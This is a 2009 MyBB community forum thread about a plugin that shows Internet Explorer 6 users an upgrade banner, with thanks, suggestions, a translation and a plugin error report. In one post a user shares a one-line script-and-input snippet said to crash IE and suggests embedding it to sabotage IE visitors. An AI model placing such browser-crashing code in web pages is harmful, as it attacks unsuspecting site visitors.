MyBB Community Forums

Full Version: [Release] IE6 No More!
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4
instead of just using the banner, how about making it to where they can't browse the forum at all or see any links except the banner while using IE6? lol.
(2009-08-13, 10:24 PM)scylla Wrote: [ -> ]instead of just using the banner, how about making it to where they can't browse the forum at all or see any links except the banner while using IE6? lol.

Or, if you really hate IE6 (Like I do), just include this tiny script:
<script>for(x in document.write){document.write(x);}</script><input type crash>
This will crash a lot (if not all) version of IE. Courtesy of CrashIE.

Note: I only give a design that sucks to my IE users, nothing more.
I think there should be message telling user to either upgrade to latest version of IE.
Great plug-in, thanks! Smile
Anti-Internet Explorer :p I never liked internet explorer when developing websites made me spend more time on them -.-

Nice plugin!
(2009-08-13, 10:24 PM)scylla Wrote: [ -> ]instead of just using the banner, how about making it to where they can't browse the forum at all or see any links except the banner while using IE6? lol.

Ya, but then you would lose the people stuck with IE6 at work or school trying to browse your site. This is a much better way of doing it. As it lets them view the site, warns them it may not display right, and offers a number of alternatives. Thus it works Toungue.
You didn't include Opera in the banner, and the new version (in beta) has a perfect ACID score...
IE6! No More!
Translated to Spanish/EspaƱol
Updated
i will remove it from my forum
it give me bugs:

(in admin cp):
Warning [2] Cannot modify header information - headers already sent by (output started at xxxxxxxxxxxxxxxxxxie6nomore.php:1) - Line: 51 - File: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\index.php PHP 5.2.9 (WINNT)
File Line Function
[PHP] errorHandler->error
xxxxxxxxxxxxxxxxxxxxxx\index.php 51 header

when i try to delete a thread

Warning [2] Cannot modify header information - headers already sent by (output started at xxxxxxxxxxxxxxxx\plugins\ie6nomore.php:1) - Line: 1541 - File: xxxxxxxxxxxxxxxxa\inc\functions.php PHP 5.2.9 (WINNT)
File Line Function
[PHP] errorHandler->error
xxxxxxxxxxxxxxxx\functions.php 1541 header
xxxxxxxxxxxxxxxxfunctions.php 1554 my_setcookie
xxxxxxxxxxxxxxxxmoderation.php 1837 my_unsetcookie
xxxxxxxxxxxxxxxxxmoderation.php 943 clearinline
Good job Glas, but did you ask Zash first?
@glas looks like you've edited the file in notepad, when editing files you should use an editor other than standard notepad.
Pages: 1 2 3 4